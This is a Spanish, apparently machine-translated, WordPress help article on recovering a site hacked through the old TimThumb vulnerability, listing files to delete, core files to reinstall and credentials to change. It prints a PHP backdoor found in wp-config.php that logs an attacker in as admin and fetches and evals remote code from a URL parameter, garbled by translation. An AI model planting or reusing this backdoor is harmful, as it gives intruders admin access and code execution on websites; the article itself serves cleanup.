Entonces, si recuerda correctamente, hubo un problema de seguridad con el script de TimThumb en agosto, que fue corregido. Sin embargo, para nuestra sorpresa, muchos sitios todavía usan la versión anterior. Hemos arreglado tres sitios hasta el momento en el último mes, uno de ellos ayer. Por lo tanto, tiene sentido simplemente escribir un artículo paso a paso, para que nuestros usuarios puedan simplemente seguirlo. Los tres usuarios para los que solucionamos este problema ni siquiera sabían qué TimThumb era o si lo estaban usando o no.
TimThumb es un script PHP que cambia el tamaño de las imágenes. Había una vulnerabilidad, pero es SEGURO usar ahora.
Entonces, ¿cómo sabes que tu sitio está hackeado? Si ve una gran pantalla roja en su navegador cuando visita su sitio:
Si comienzas a recibir bombardeos con correos electrónicos sobre usuarios redirigidos desde tu sitio. Lo más probable es que el caso sea que su sitio fue víctima de este exploit.
Como medida de precaución, todos deberían usar este Timthumb Vulnerability Scanner. Esto le dirá si está usando la versión anterior de TimThumb. Muchos clubes temáticos actualizaron su núcleo de inmediato. Por lo tanto, este complemento verificará si la nueva versión segura de Timthumb está instalada o si está instalada una versión anterior.
Ahora, si su sitio ya fue presa de este exploit de Timthumb, entonces esto es lo que debe hacer.
Primero necesita eliminar los siguientes archivos:
/wp-admin/upd.php /wp-content/upd.php
Inicie sesión en el panel de administración de WordPress y vuelva a instalar su versión de WordPress. Estamos específicamente buscando reinstalar estos archivos:
/wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js
Luego abre tu wp-config.php donde probablemente encontrará este gran código de malware que está recolectando credenciales de inicio de sesión y cookies. Este código estará hacia la parte inferior.
if (isset ($ _ GET ['pingnow']) && isset ($ _ GET ['pass'])) {
if ($ _GET ['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') {
if ($ _GET ['pingnow'] == 'login') {
$ user_login = 'admin';
$ user = get_userdatabylogin ($ user_login);
$ user_id = $ user-> ID;
wp_set_current_user ($ user_id, $ user_login);
wp_set_auth_cookie ($ user_id);
do_action ('wp_login', $ user_login);
}
if (($ _GET ['pingnow'] == 'exec') && (isset ($ _ GET ['file']))) {
$ ch = curl_init ($ _ GET ['file']);
$ fnm = md5 (rand (0,100)). '. php';
$ fp = fopen ($ fnm, "w");
curl_setopt ($ ch, CURLOPT_FILE, $ fp);
curl_setopt ($ ch, CURLOPT_HEADER, 0);
curl_setopt ($ ch, CURLOPT_TIMEOUT, 5);
curl_exec ($ ch);
curl_close ($ ch);
fclose ($ fp);
eco "";
}
if (($ _GET ['pingnow'] == 'eval') && (isset ($ _ GET ['file']))) {
$ ch = curl_init ($ _ GET ['file']);
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, verdadero);
curl_setopt ($ ch, CURLOPT_HEADER, 0);
curl_setopt ($ ch, CURLOPT_TIMEOUT, 5);
$ re = curl_exec ($ ch);
curl_close ($ ch);
eval ($ re);
}}}
En la carpeta de su tema, busque en cualquier lugar que el script TimThumb esté almacenando los archivos en caché. Usualmente están en esta estructura:
/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php
Eliminar todo lo que se parece a esto. Si no está seguro de las cosas, elimine todo lo que no sea un archivo de imagen.
Lo siguiente que desea hacer es reemplazar timthumb.php con la última versión que se puede encontrar en http://timthumb.googlecode.com/svn/trunk/timthumb.php
Ahora sería una buena idea cambiar sus contraseñas comenzando con su información de inicio de sesión de MySQL a su información de inicio de sesión de WordPress. No olvides cambiar la contraseña de MySQL en wp-config.php o obtendrás la pantalla «Error Establishing Connection».
Cambie las claves secretas en su archivo wp-config.php. Puede generar una nueva clave yendo al generador en línea.
Ahora terminaste. No olvides vaciar todos los complementos de caché de página. Como medida de precaución, es bueno borrar el caché de su navegador y las cookies también.
Para los desarrolladores, intente utilizar la función Tamaños de imagen adicionales en WordPress para reemplazar las funcionalidades de Timthumb.
Háganos saber si necesita más ayuda utilizando nuestro formulario de contacto.
